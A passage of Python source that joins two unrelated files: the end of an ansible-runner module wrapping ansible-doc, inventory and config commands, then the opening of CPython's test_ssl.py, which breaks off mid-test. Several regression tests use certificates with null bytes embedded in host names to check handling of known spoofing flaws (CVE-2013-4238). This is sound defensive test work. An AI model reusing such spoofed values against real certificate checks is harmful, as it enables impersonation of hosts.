:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type timeout: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type check_job_event_data: bool
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
``pexpect`` uses same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``
it returns a python dictionary object.
'''
r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
def get_plugin_docs_async(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.get_plugin_docs`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
doc_runner_thread = threading.Thread(target=r.run)
doc_runner_thread.start()
return doc_runner_thread, r
def get_plugin_list(list_files=None, response_format=None, plugin_type=None, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command to get list of installed Ansible plugins.
:param list_files: The boolean parameter is set to ``True`` returns file path of the plugin along with the plugin name.
:param response_format: The output format for response. Valid values can be one of ``json`` or ``human`` and the response
is either json string or plain text in human readable foramt. Default value is ``json``.
:param plugin_type: The type of the plugin mentioned in plugins_names. Valid values are ``become``, ``cache``, ``callback``,
``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
``module``, ``strategy``. If the value is not provided it defaults to ``module``.
:param playbook_dir: This parameter is used to sets the relative path to handle playbook adjacent installed plugins.
:param module_path: This parameter is prepend colon-separated path(s) to module library
(default=~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
the work directory within container.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param timeout: The timeout value in seconds that will be passed to either ``pexpect`` of ``subprocess`` invocation
(based on ``runner_mode`` selected) while executing command. It the timeout is triggered it will force cancel the
execution.
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
value is set to 'True' it will raise 'AnsibleRunnerException' exception,
if set to 'False' it log a debug message and continue execution. Default value is 'False'
:type list_files: bool
:type plugin_type: str
:type response_format: str
:type playbook_dir: str
:type module_path: str
:type runner_mode: str
:type host_cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type timeout: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type check_job_event_data: bool
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
``pexpect`` uses same output descriptor for stdout and stderr. If the vaue of ``response_format`` is ``json``
it returns a python dictionary object.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = DocConfig(**kwargs)
rd.prepare_plugin_list_command(list_files=list_files, response_format=response_format, plugin_type=plugin_type,
playbook_dir=playbook_dir, module_path=module_path)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
def get_inventory(action, inventories, response_format=None, host=None, playbook_dir=None,
vault_ids=None, vault_password_file=None, output_file=None, export=None, **kwargs):
'''
Run an ansible-inventory command to get inventory related details.
:param action: Valid values are one of ``graph``, ``host``, ``list``
``graph`` create inventory graph, ``host`` returns specific host info and works as inventory script and
``list`` output all hosts info and also works as inventory script.
:param inventories: List of inventory host path.
:param response_format: The output format for response. Valid values can be one of ``json``, ``yaml``, ``toml``.
Default is ``json``. If ``action`` is ``graph`` only allowed value is ``json``.
:param host: When ``action`` is set to ``host`` this parameter is used to get the host specific information.
:param playbook_dir: This parameter is used to sets the relative path for the inventory.
:param vault_ids: The vault identity to use.
:param vault_password_file: The vault password files to use.
:param output_file: The file path in which inventory details should be sent to.
:param export: The boolean value if set represent in a way that is optimized for export,not as an accurate
representation of how Ansible has processed it.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
the work directory within container.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param timeout: The timeout value in seconds that will be passed to either ``pexpect`` of ``subprocess`` invocation
(based on ``runner_mode`` selected) while executing command. It the timeout is triggered it will force cancel the
execution.
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
value is set to 'True' it will raise 'AnsibleRunnerException' exception,
if set to 'False' it log a debug message and continue execution. Default value is 'False'
:type action: str
:type inventories: list
:type response_format: str
:type host: str
:type playbook_dir: str
:type vault_ids: str
:type vault_password_file: str
:type output_file: str
:type: export: bool
:type runner_mode: str
:type host_cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type timeout: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type check_job_event_data: bool
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is
empty as ``pexpect`` uses same output descriptor for stdout and stderr. If the vaue of ``response_format`` is ``json``
it returns a python dictionary object.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = InventoryConfig(**kwargs)
rd.prepare_inventory_command(action=action, inventories=inventories, response_format=response_format, host=host, playbook_dir=playbook_dir,
vault_ids=vault_ids, vault_password_file=vault_password_file, output_file=output_file, export=export)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
def get_ansible_config(action, config_file=None, only_changed=None, **kwargs):
'''
Run an ansible-config command to get ansible configuration releated details.
:param action: Valid values are one of ``list``, ``dump``, ``view``
``list`` returns all config options, ``dump`` returns the active configuration and
``view`` returns the view of configuration file.
:param config_file: Path to configuration file, defaults to first file found in precedence. .
:param only_changed: The boolean value when set to ``True`` returns only the configurations that have changed
from the default. This parameter is applicable only when ``action`` is set to ``dump``.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param host_cwd: The current working directory from which the command in executable_cmd should be be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from Ansible.
Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param timeout: The timeout value in seconds that will be passed to either ``pexpect`` of ``subprocess`` invocation
(based on ``runner_mode`` selected) while executing command. It the timeout is triggered it will force cancel the
execution.
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
value is set to 'True' it will raise 'AnsibleRunnerException' exception,
if set to 'False' it log a debug message and continue execution. Default value is 'False'
:type action: str
:type config_file: str
:type only_changed: bool
:type runner_mode: str
:type host_cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type timeout: int
:type ssh_key: str
:type quiet: bool
:type: json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type check_job_event_data: bool
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is
empty as ``pexpect`` uses same output descriptor for stdout and stderr.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = AnsibleCfgConfig(**kwargs)
rd.prepare_ansible_config_command(action=action, config_file=config_file, only_changed=only_changed)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
return response, error
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
